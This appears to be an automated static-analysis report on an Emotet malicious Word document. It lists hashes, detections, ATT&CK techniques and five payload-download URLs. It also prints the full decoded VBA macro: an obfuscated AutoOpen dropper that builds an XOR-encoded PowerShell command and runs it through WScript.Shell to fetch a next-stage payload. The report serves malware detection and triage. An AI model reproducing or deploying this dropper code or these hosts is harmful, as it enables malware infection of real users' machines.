Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 ae3d2a023959aa8e…

MALICIOUS

Office (OLE)

Size: 228.0 KB
Created: 2018-07-04 07:15:00
Authoring application: Microsoft Office Word
First seen: 2018-10-07
MD5: 9da97dbe9fbe16be70328f4627dbfaea
SHA-1: 054c472d9967e8b73533e98b08791209acc570b6
SHA-256: ae3d2a023959aa8ec268a8bc68ec85b9e70e77d93022cf4653f5d5efadb07b06
Risk Score: 350

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic · T1204.002 Malicious File · T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function, which is a common technique for Emotet. The macro utilizes WScript.Shell and CreateObject, indicating it attempts to execute commands or download additional payloads. The ClamAV detection explicitly names 'Doc.Downloader.Emotet-6877381-0', further supporting the Emotet family attribution.

Heuristics 11

  • ClamAV: Doc.Downloader.Emotet-6877381-0 · critical · CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6877381-0
  • VBA macros detected · medium · 5 related findings · OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage · critical · OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
       niDiSL = oVIrZj / nbWdq / (wvDSwQ + 84883 - qHBmV - inLtnt - (13398 * jWbXUa))
    sADiUkpWFB = fScszc + CreateObject("Wscript.shell").Run(OAzwzrj + Chr(vbKeyP) + oPoIO + Chr(vbKeyO) + zEQRKXmFB + UbJQPFFVfw, 529318425 - 529318425)
       RfqSM = orQtW / jJHXjf / (YMQvpU + 25358 - IntDsA - PfVrj - (87084 * iELai))
  • CreateObject call · high · OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       niDiSL = oVIrZj / nbWdq / (wvDSwQ + 84883 - qHBmV - inLtnt - (13398 * jWbXUa))
    sADiUkpWFB = fScszc + CreateObject("Wscript.shell").Run(OAzwzrj + Chr(vbKeyP) + oPoIO + Chr(vbKeyO) + zEQRKXmFB + UbJQPFFVfw, 529318425 - 529318425)
       RfqSM = orQtW / jJHXjf / (YMQvpU + 25358 - IntDsA - PfVrj - (87084 * iELai))
  • Payload URL decoded from an encoded PowerShell loader (5 URLs) · high · OLE_VBA_ENCODED_PS_DROPPER_URL
    A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
  • VBA p-code auto-exec with execution tokens · high · OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro · low · OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "qSYjdcd"
    Sub AutoOpen()
    On Error Resume Next
  • Reference to Windows Script Host · high · SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker · medium · OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact · medium · EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL · info · EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL
    • http://www.bobomotorcyclerental.com/FXcSPO/ · Referenced by macro
    • http://www.eobienxanh.com.vn/lnHq/ · Referenced by macro
    • http://www.lanortenataqueria.com/OVgUg/ · Referenced by macro
    • http://www.creedcraft.net/MZD6i/ · Referenced by macro
    • http://www.ilkanilaranaokulu.com/aTlZC/ · Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/main · In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15821 bytes
SHA-256: b93cdc2a2ab07ee2c1b1e94a8d2156616efb5e52226fb555d1c4875d599bc98f
Detection: ClamAV: No threats found
Obfuscation or payload: likely
317 of 591 identifiers look randomly generated (e.g. 'zXJqGLhiaJSkE') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "VcRUbpYWw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "qSYjdcd"
Sub AutoOpen()
On Error Resume Next
   uzKUYH = 27683 * DTkHMS * 15121 - zrXsHn / (boATM * aBDoMp * 77444 * 90158) / (22825 / HIiRO - XbBDkO * fVVGp)
   sqQjJ = 99564 * tVnGq * 91457 - mhwiMz / (ZUjBIj * wCRPqw * 27455 * 91185) / (46897 / zETiO - VuUKJD * MDAcTW)
   DrKnN = 90477 * IqbqJD * 3717 - zibmPd / (rzSon * VmIGB * 81359 * 68674) / (76136 / jkPXV - iXioT * fMGCN)
   jXnBwc = 35675 * SzcTzm * 59398 - jZWuo / (ZSJFM * XSriwM * 60287 * 78616) / (38465 / mpwGE - YjlckP * wkvuPw)
   wbAMQ = 57999 * aTSRw * 79270 - YfOvj / (QaTAr * RSIlZY * 23645 * 66824) / (79135 / jjLAkw - zdPlZw * vEjMwW)
   WssYC = 72946 * NYNPL * 90973 - qDNkzN / (QnZAqO * uhFVi * 36928 * 44128) / (72386 / ijrLi - ZAJEDl * bsvjU)
   fBTNvS = 42285 * zzNrIi * 71526 - iOKWO / (nWlvF * MpWuY * 83791 * 70137) / (92255 / Fjwbiu - wSuOb * WNJzSY)
   AUmMr = 35236 * tsmGju * 92430 - jjbUzT / (bssUa * UpAmTV * 67024 * 28271) / (47604 / tduGld - sEmQUz * cYodtt)
lcwzqMqaw (AMiGQLcAnq + qEzrUrKE + MkMiFOmX)
   qvhaL = 72869 * lvThdt * 46078 - VdlBJ / (wRNIRr * JUlTz * 89321 * 81469) / (75656 / wJOSCV - vwzIBa * EdpZt)
   sTBXVi = 70692 * mCNRN * 35637 - alpSHh / (aEzLo * KFXmIu * 65764 * 53510) / (3686 / zVqAt - PYkNlY * SKEBp)
   ETYMW = 19719 * rIujc * 19932 - BfBGC / (kOYql * YZFMa * 96811 * 97039) / (31566 / iJXUAL - RGdctj * wrpiz)
   URuunb = 51216 * Oizhfu * 63613 - mrtbiS / (SiEjH * qJUwJH * 59681 * 28604) / (39507 / avDhUA - Wjjcqz * SzCHcL)
End Sub

Function AMiGQLcAnq()
On Error Resume Next
GlkWkW = IZctE / iJowEJ * 61693 - GOzZH * VzIjYp * FzAhwz - 53457 + EwVPO / 32119 + WfHKi
   sZAldj = 56211 - pLsMhr / 18030 * 70230 - 90602 - AJLilE - 63052 - ATdaO * 38263 / 11129 / 98890 - LcLUK
   ZzHLok = (43419 * joQGDO - 47193 + afoDfw * (30473 + bIuiH / LdQlcH / Cvjmd - zpuwj * OIkLv))
   zXnzd = DKRsUO / dMnPH * 23672 - wCPcJ * RIaccO * CFZNj - 37763 + YAmGA / 2083 + mAjQzw
iULZSGm = "wershel" + "l        " + "        " + "  ." + Chr(40) + " $vER" + "bosE"
PdCVfb = (89764 * CVUbl - 80760 + FVLVLI * (94555 + ciNSw / aLqzGL / QtOTvP - hkELH * fivIhl))
   bhzjfp = (84481 * sdnpRm - 31890 + XkEQB * (64174 + ThKKQ / iaRVqA / USPtuq - UCEjz * ukAGit))
   nchRQw = (88527 * fuwOLm - 54991 + YAtQoo * (25807 + zUhObt / bwbFC / lfKFK - cKLVq * siwNA))
   MZqRJ = (93154 * bKdif - 59377 + obwCP * (86204 + ksZBKC / wPhPU / iqCwJz - qWGaj * oqCwGR))
nBmaqJuaBF = "prEfERen" + "cE.t" + "oStrIng" + Chr(40) + Chr(41) + "[1" + ",3]" + Chr(43) + "'X'-J" + "oin''" + Chr(41) + " " + Chr(40) + "[" + "StRiN" + "g]::JoIN" + Chr(40) + " '' " + ", " + Chr(40) + "'8" + "K72_97<1" + "10S17w"
dSdva = (56647 * XJGSMa - 71877 + Sjpmm * (10855 + nsOjQf / ojIzl / wqoSv - ApicY * AdYupC))
   wOuRv = (33624 * SmcUQj - 62715 + omUiL * (58192 + kcnzqC / PSOzXG / OUktZr - zpvlK * DriipZ))
   KzZWq = (97930 * DAbiEG - 34972 + KXnzI * (51883 + atwhz / ACuauz / UshRY - zAsjNC * QpYMTD))
   Psilju = (25034 * zVXKP - 77751 + dcvXqi * (9106 + EPqvPB / ttFJWR / EHXiD - UKSIv * AwzSL))
YdwEo = "66v73<" + "91<1v6" + "7<78J70K" + "73>79" + "S88w12J98" + "K73v88>" + "2_123K7" + "3J78"
nTrdc = (64922 * UzvUoC - 82661 + iNBsd * (99212 + jfjzz / vsPJKz / sQfww - iLiiG * kQAcq))
   HWjZIw = (13770 * zhDKG - 12608 + SpWbWb * (4817 + MifWZL / iHqREz / HIZiz - KdDvX * WiprhH))
   FoDjOQ = (98700 * firFr - 97223 + nELvl * (67717 + GJzYA / IVLVn / aGqZqV - oWjLz * dKQzXw))
   dFQjLt = (56741 * DYHfLi - 4926 + NRiEvX * (32145 + AwciM / uPZUj / tJFmTM - KDDXb * DCjul))
kojzRzqLjz = "o111<64w6" + "9e73" + "_66o88e2" + "3>8S64" + "v103J" + "78w17_" + "11<68K" + "88>88S"
jPlHw = (72853 * smVmiw - 59513 + hdBrUV * (70412 + lNHUc / tZElz / AEQwC - MuEZi * AQYiRb))
   Kkhul = (80686 * nOKSV - 34826 + XCziV * (51472 + uwazz / XBsXnX / QqYvnA - jaMNq * QFISSC))
   IjoPaw = (18983 * dnFoAW - 88837 + qtEkZ * (77988 + UpWvu / ztqoGw / QHjnX - XUmAs * WYbVi))
   BwvAtp = (33081 * bswit - 97179 + zcNCpR * (18852 + PLiPUL / OIcEwE / EWJkh - BIrptZ * wRPmP))
SPZCJivXDb = "92o22K3>" + "3_91" + "S91_91<2K" + "78_6" + "7<78>6" + "7w65e"
vDmmk = (49535 * rNJXH - 80406 + zVKzi * (57800 + FZMKo / PVGdLp / rYNJzF - QDhDPK * fjHtjo))
   SUYUZD = (3296 * ljuPz - 88523 + VGiKQ * (25340 + Qmhod / XXWXHK / cAwifm - QraWA * cBRsLS))
   nmQjT = (14918 * jIvjR - 34391 + dSTBN * (35960 + GpRwPJ / QttXOH / HYBhD - OnGMf * PcGmpt))
   qiZbw = (89712 * VHjLSz - 28740 + HBCZB * (78215 + rJvdm / pzkfBf / uohAL - uvBswN * GZFqHm))
mwVBwdL = "67_88_67" + "v94K79K" + "85K7" + "9<64w73w" + "94w73w66" + "v88>77" + "K64<" + "2S79" + "K67v65S3" + "S106>116" + "w79>12" + "7_124J99"
wNOtN = (69043 * fFIzf - 18012 + SLVwqF * (5162 + uiCsid / wnjuUf / wfFtA - sQHXS * zvqUi))
   djzwh = (7548 * jQPBID - 19672 + VuSUKu * (61221 + jFTUt / KHEdt / hKZTdF - wYEDbl * GLTVj))
   LNwXvn = (97481 * HVslz - 4242 + IEiRE * (66363 + rwZjSI / YqQoKA / oUimmt - RkSziz * cuOWG))
   XQTjrV = (2407 * lHUNlp - 1495 + PpszEr * (79463 + XiZdfw / SFQwP / MoksaZ - vumdEw * AbhZjb))
GaZMEO = "K3e108" + "w68<88>8" + "8<92w22K" + "3e3J9" + "1<91e91>2" + "<73<6" + "7S78o6" + "9_73>" + "66_84" + "K77J66J6" + "8v2v79" + "J67v"
qhjioo = (66035 * jkiSj - 24995 + NWIpmD * (72894 + LhYDA / MmbKA / hkNsNE - pauISf * ViJBI))
   VzzOVq = (23209 * ibzoBZ - 39662 + zfSpra * (22802 + joIXv / BRDSGo / PRvhC - IVLcaw * vjERrv))
   IREbK = (26529 * LpUhFP - 10811 + OwowKt * (52785 + dYSYj / Fkzbz / DKkRO - PjIFvY * cdcEcQ))
   EMVAQl = (64375 * TzHHf - 63178 + dJQbh * (38816 + uRZGXp / idZCQb / OMbcX - VdnAnw * sZsaa))
IMGNXCi = "65e2<90v6" + "6<3<64" + "o66e100" + "v93e3_108" + "K68K88o88" + "w92S" + "22>3K3" + "w91_91K9"
tlrCYw = (18003 * iHDLR - 75532 + ZUiwJJ * (44092 + jAMmYF / Mwiaj / MjIdQ - ZoVMz * GZEll))
   jAaCr = (78908 * Ikjid - 29981 + dEMWji * (57830 + IXdufE / cjXLc / DjhaZU - wZXRI * zZPis))
   fYbtOA = (86848 * VkStk - 87535 + jJJZzN * (66684 + QzIFA / UjMtG / onKQv - NrHbXv * ZZCGp))
   bWmHCM = (19766 * BhuFjr - 8017 + NoVStv * (95817 + NoMRS / wbMwwM / EiwTj - ruQfH * ILPPT))
jNlGBKt = "1o2S64w77" + "v66<6" + "7S94w88K" + "73J66" + "v77_8" + "8S77" + "<93v89S7" + "3v94_" + "69J7" + "7<2o79J67" + "e65S3<"
GTXWsE = (35954 * idjaw - 10828 + Tkidru * (99545 + SDvDDF / NLiCO / ErSwO - IYmwTh * LTiiDh))
   bzSLw = (10665 * tIAEGA - 56837 + CvwtdY * (98944 + zoaNqa / RaWZiV / cOKAh - rCVXR * WiDMLv))
   YMTiBY = (51321 * vWbiwO - 37845 + kdBEPS * (14591 + fCzTV / ABtfbM / RwoMb - dvIMi * USwRK))
   XETwA = (28974 * VQYww - 82085 + OsPjdO * (84051 + jGcWN / ujcaUI / zYWwzM - INzWqL * bOCaTO))
XQsOC = "99J1" + "22>75S121" + "J75e3e1" + "08_6" + "8o88<88_" + "92K22w3" + "v3e91>9" + "1v91" + "S2o79S94" + "J73v73v" + "72o79"
zGaDc = (16209 * vKNRr - 11239 + SzCzf * (99649 + WDXpDw / LXIni / wOhlq - BJGjpd * VcAbA))
   GENzwa = (14250 * VVaoT - 75580 + qSfNs * (75768 + iKWqO / BIEjj / UHoSzN - QwHUT * vAdzQE))
   GAJiVA = (67528 * BYpwbn - 2842 + snrqJ * (80235 + wqVwQ / SclQGT / OdIXiv - Aihkc * vfvTA))
   EiaCDN = (47757 * sjmEi - 25170 + ZERQIo * (97126 + QUhMpb / KwICZn / LiYRf - ZUiLQ * wYiLr))
RrIiVZkDj = "<94v" + "77J7" + "4>88o" + "2>66K73v8" + "8>3_97K11" + "8>104K" + "26v69S3<1" + "08w68"
irvjO = (70065 * VvQmQ - 2650 + XldWB * (84824 + KAsHW / jaXQT / uUAFC - iqVcnn * NqlYmu))
   QvNsAE = (35642 * iwEjU - 39276 + mPiUI * (25808 + ESIlTs / njSQTC / BlITQq - DZBPI * JQQws))
   RfwAq = (56778 * EkDrso - 58241 + UPBNcB * (54052 + AbdZl / BcjJZE / ZqGjFV - GJhQJ * XqrBQ))
   ACXqCb = (86314 * pvYzT - 85605 + zXfbc * (35182 + BhNFW / VwCkV / XrwJC - AKAZEn * sGsOs))
TlilWwUUXCK = "<88S8" + "8K92K22" + "K3e3w9" + "1_91_91_" + "2K69o64_" + "71<7" + "7K66" + "o69e64K" + "77S9" + "4K77S66o"
AMiGQLcAnq = iULZSGm + nBmaqJuaBF + YdwEo + kojzRzqLjz + SPZCJivXDb + mwVBwdL + GaZMEO + IMGNXCi + jNlGBKt + XQsOC + RrIiVZkDj + TlilWwUUXCK
   tddWG = (58811 * nwTYoa - 81422 + LpUICF * (56912 + fUqwLh / ftoOz / lwUmto - bIraHC * YGJuO))
   pXzZN = (7615 * aiaIj - 27897 + HvZvhW * (61083 + BruNQ / HKlis / OSbRt - tvjjAz * iObRw))
   kcYzsf = (92592 * PuFLI - 38392 + zuQDjf * (40447 + lBYSNw / wIDzI / WFLZl - YklDIW * iMWhN))
   twBPh = (77212 * uniAL - 83102 + aszVI * (32920 + IWcQpI / cYkuA / smvFEF - BnirPQ * wjHnlw))
End Function
Function qEzrUrKE()
On Error Resume Next
IScnB = (6509 * cHtXW - 34633 + SCshM * (33810 + iVULAR / aGjHWY / azvGov - FhPRim * bPrFmX))
   PknwU = (24956 * VwzzHI - 22126 + boEizv * (93087 + zzQwF / EZapv / aiHrMD - anowz * iHYSD))
   IDhiHm = (5976 * YMPrN - 27840 + dVVFt * (45667 + EdlSs / YZVUwO / lmavd - uvnCt * mHptLK))
   zIbAmf = (3864 * NPzta - 84366 + wbYVS * (54206 + EuWisw / pCkBMd / TFCQYE - ARlMA * SPhQE))
FwsMVzdLri = "77e67J" + "71v89" + "e64_8" + "9o2K7" + "9o67o" + "65J3_" + "77J12" + "0e64e" + "118w1" + "11K3v11J2" + "<127S" + "92K64"
NjdAUo = (11425 * ThkJK - 21527 + INUsdU * (54955 + TuTNr / jZawqU / Fjluo - dOWnp * lplQqJ))
   anzEt = (78270 * alwruv - 97811 + dquabY * (56549 + QasTF / jfJJl / ilihGj - JwvHzA * dwwkjm))
   NzWwH = (38475 * zZWFHB - 14803 + wfNUH * (688 + iJoKJp / sTzzfi / NWTYzG - GPjuiz * NHwiHd))
   lOJGBb = (27216 * mIKLT - 82095 + DjiwoM * (97770 + wGifG / uJkpOj / vakTas - GMcVrv * FhsVQm))
HsEwGMPhk = "o69J" + "88v4S11" + "J108J" + "11S5o23J" + "8w86<" + "120e122" + "J12v" + "17<12" + "e11J2" + "7o26J"
UDjjMi = (5145 * HqzUam - 86611 + iMKsS * (72960 + rYWwaz / zJZGi / qjjEB - Aiakt * LoRJE))
   NHwKC = (45247 * CIJVZf - 72516 + uvItz * (45018 + EQiptf / BSXEE / PWNwjE - HZYFT * EMAVOf))
   dXUNvN = (58185 * FiJtK - 88458 + djiRir * (12205 + wEijES / GqzzK / EjbLvV - Dffska * zQizFW))
   fiYoIq = (65195 * pGtovU - 14228 + hCcFqD * (72268 + QndlOL / nFmawn / YtXZZ - pmpYDi * Pjwvb))
sjoXtZaL = "29J11" + "w23>8K95" + "<120J101" + "e17J8>73J" + "66v90<2" + "2K88" + "<73S65_9" + "2e7o11J11" + "2K11S7o8" + "<86S" + "120K122"
jWivY = (79654 * HsQwQq - 61149 + YNFmzG * (77357 + wFUOj / mLnTjn / CasvpF - QEHVOQ * BcNSv))
   VIMiZF = (97630 * TuLjBZ - 5996 + FiWWa * (36780 + qzijJ / LBunlj / OhVQk - MljAYM * JYOizS))
   mqFao = (67395 * WjzYz - 39897 + AZWZQJ * (66615 + nmdAGV / CrqtN / ujuvBR - MNnXuj * pAjdp))
   MjpDaF = (39982 * EIzJr - 1525 + mNqKB * (92277 + uwwAQl / iZAlsj / loUkk - LvKMWP * PPWIuz))
GIzaYzjL = "o7S11" + "_2e73" + "o84>7" + "3w11" + "<23v74o6" + "7J94K73>" + "77>79e68K" + "4<8<126" + "K92o111" + "<12_" + "69K6" + "6e12"
UrhCsX = (57285 * TCcTOZ - 60569 + raGGS * (84370 + SJwfdD / GouOwF / VZOCLm - LzuZt * WWjvKc))
   nDSznc = (98541 * jFhGG - 29865 + qcdPs * (87422 + awFGZG / CINDiw / QwIYSm - IGQnQI * YFNzqB))
   XbIhq = (73603 * arMjY - 89871 + XitVV * (2620 + mIknIK / cbNMI / zbDuo - nrbFmz * mvHIB))
   PtusA = (87222 * woYzd - 50471 + VArDGF * (51433 + LDGkS / jEzEUC / cfWCS - SWYvv * qBWsr))
MzGGUj = "_8K64_103" + "S78K5>" + "87>88K94" + "K85S87K" + "8w72" + "o97<110o" + "2K104>" + "67>91J6" + "6K64>67>"
aQaGb = (6721 * czlhzI - 99822 + zwZcYC * (99090 + iEAzXs / rDqTm / EufFPS - Vhlwa * cLvJD))
   pPkTY = (88783 * bzzQwX - 31780 + Mwfwjk * (27273 + KCznHY / VSMpS / MIfAGI - uLHPjG * zcJUlb))
   ufpurh = (47818 * rTpzjT - 70797 + YjLqY * (94623 + Lwzpr / wirwI / XWcUKf - UPkiT * ZKqzu))
   aUsBa = (11187 * jntiH - 77855 + vvEuX * (17421 + laATBX / Pwwun / LXLsE - LiabDd * MPhGA))
GakcOon = "77o72o1" + "06e69" + "K64e73w4w" + "8w126S" + "92<111_" + "0_12w8" + ">95J120"
UsDbQ = (23158 * YozBO - 64179 + TnPpiM * (29600 + Hormw / VLCDn / bBoEJG - UlikOK * tqfsL))
   Nziiw = (89061 * hYukwB - 53298 + MjvPBK * (14756 + maUifS / Gkwmu / tsjZSw - aimdrj * iuitz))
   IvAHLI = (2954 * zWwmG - 51016 + uBYrAk * (9885 + IvRpLt / nMwIsB / IOLiV - uLufMV * ZScLz))
   qRkPkd = (29161 * Cdzwb - 86936 + SwLjb * (57665 + RcDcct / fjKrA / JQZTfr - RIhmm * zbrUM))
ZlcUzq = "e101" + "J5J23<1" + "27K88K" + "77<94" + ">88w" + "1>124S94" + "K67w79>7" + "3S95w9" + "5o12o8_95" + "K120J101" + "e23v78>" + "94w73S77_"
jvLHo = (1111 * COBBos - 19955 + zpmiV * (31968 + VvEzO / iMmzY / zUkNE - FLzZDs * QvjSKH))
   SsMtS = (81594 * Njkozh - 88460 + tKfWOi * (66059 + BmdpoK / jmJpj / wUtnt - LaFhi * SjIwpk))
   zCocZ = (82946 * opdGmO - 11584 + YHsSS * (87897 + ScmriC / jXEAdK / wRuTm - zJpXk * rikiX))
   INZQC = (79693 * QYBPEP - 52951 + CMciv * (30843 + YwrLM / buucqJ / muUKP - omwKz * KGsWpc))
hDjvPjWpQn = "71e2" + "3w81K79" + "_77w88_7" + "9<68S" + "87e81" + "e81'.sPL"
dlwbY = (53295 * zQnHM - 40585 + ZIsnPj * (77778 + QhEzd / jjBEM / NZqtN - nNwcms * qaTlU))
   SXkLq = (64050 * awFFC - 73393 + vNaqzz * (61719 + bImOHL / Jwthr / mVmbN - MQtEn * zbiIuh))
   BJlhS = (19588 * LkzoFi - 71654 + cvpbnO * (49966 + LwMUbd / OHnJM / TWJMv - lDXlEG * jfMKG))
   zkJVOW = (49009 * SNjmDz - 24113 + zRwaPv * (51597 + nvMhm / QuhZOY / EcWnA - AMqis * JaBmt))
tJSjX = "It" + Chr(40) + "'ve<_" + "oK>wJS" + "'" + Chr(41) + "| fOrEa" + "Ch { [C" + "HAR] " + Chr(40) + " $" + "_-bx"
qEzrUrKE = FwsMVzdLri + HsEwGMPhk + sjoXtZaL + GIzaYzjL + MzGGUj + GakcOon + ZlcUzq + hDjvPjWpQn + tJSjX
   vOanLn = (49027 * cHlCjj - 68058 + nsQnd * (85266 + ShDvq / fQZUW / TiwVF - FuXVE * HlZvBG))
   biakG = (80154 * idijR - 38946 + YJYjP * (84121 + oXnLI / JwbCz / JljslD - iHHUr * kitXG))
   FKMctC = (55455 * Nbthqk - 96118 + wJwzt * (99109 + mGlPk / dkXIo / HNPULA - kEQom * XwKVwu))
   CDBIF = (15595 * iawqMi - 19774 + QboWLb * (46314 + qwcPoF / jPSATw / asNOd - zjJWdZ * zGivs))
End Function
Function MkMiFOmX()
On Error Resume Next
vEEINi = (45742 * azMzF - 69735 + nbNoP * (28281 + bCOchw / iLPHuK / oDJiDj - wDlrwG * EzJjcF))
   GAaWHn = (84696 * kqWZCr - 82118 + jolwqP * (9858 + RwZNE / PYNCl / ntMXI - AOuPkz * HdjNwv))
   BRALma = (26396 * rQtTNL - 27886 + ckXGUt * (69575 + OAJzQ / GUDGl / XWphik - cnCbi * PXkZv))
   Bulwbb = (84323 * wrLZSw - 45977 + JLfCi * (99404 + klpAiM / bSFFn / YhbHv - GtjWo * jvzUzC))
MtUWSZf = "Or '0" + "x2C'" + Chr(41) + "}" + Chr(41) + Chr(41) + Chr(41) + ""
MkMiFOmX = MtUWSZf
   ZijMll = (16264 * ocIiz - 21752 + frZGJC * (80834 + aFbit / fMlhz / zqqijS - cmcpG * alzJPk))
   IhwwlQ = (31713 * mKYQG - 51214 + IFvqY * (69448 + HRMZfi / hVvHc / LbZDQR - cROlUE * HRpjWu))
   LrpEv = (18854 * NCzaWO - 17755 + azntt * (90834 + WNmbil / jDajKU / iYHatH - tjodm * nrFDdP))
   jbJHKC = (28373 * IQXwwZ - 68097 + BvariN * (32111 + PUwSii / VzXCV / jUdDkU - FsHLr * wOotzW))
End Function


Attribute VB_Name = "zXJqGLhiaJSkE"
Function lcwzqMqaw(zEQRKXmFB)
On Error Resume Next
   wEbwlH = DjurN / CDrfwL / (oFGsA + 54343 - GTwzX - LBXNuS - (51435 * Spdmvt))
   qwQhJw = abaslo / cEtsj / (mpiko + 23066 - oPRdhz - bNnUjv - (14318 * iPNatZ))
   SBouv = nAjjWA / DJiiWJ / (RLwFzD + 39632 - zcpqD - wVZYiJ - (45296 * FfIzjr))
   EZrUUp = Sjszw / LJzLl / (dPQZLn + 94786 - HOXOSa - LslMfz - (50264 * HbjwGl))
   wWOWTi = PSZKLN / fztIFB / (qIHaP + 83951 - qoTDW - HpSUH - (34403 * lpfqTZ))
   BndDUk = rwjvJ / AjmvUk / (Ajili + 71387 - WPcFF - jEfTwD - (85308 * KYdwI))
   iCAIh = rikkBT / wNHFD / (nzPcpw + 38255 - Mhqbw - AHFAi - (76544 * mJbJma))
   niDiSL = oVIrZj / nbWdq / (wvDSwQ + 84883 - qHBmV - inLtnt - (13398 * jWbXUa))
sADiUkpWFB = fScszc + CreateObject("Wscript.shell").Run(OAzwzrj + Chr(vbKeyP) + oPoIO + Chr(vbKeyO) + zEQRKXmFB + UbJQPFFVfw, 529318425 - 529318425)
   RfqSM = orQtW / jJHXjf / (YMQvpU + 25358 - IntDsA - PfVrj - (87084 * iELai))
   HLhAj = jFNHw / mmYiG / (oohpf + 49128 - nWaBc - Hpitf - (12499 * XzpCc))
   wSiuhz = SipbwT / lAmmvD / (GBkYu + 26425 - LLJwRu - VEzRi - (42884 * TIjfu))
   XDfsM = Zkilb / jIzsC / (ElroO + 7395 - tXojrw - NVBzIi - (26529 * DjdEHb))
End Function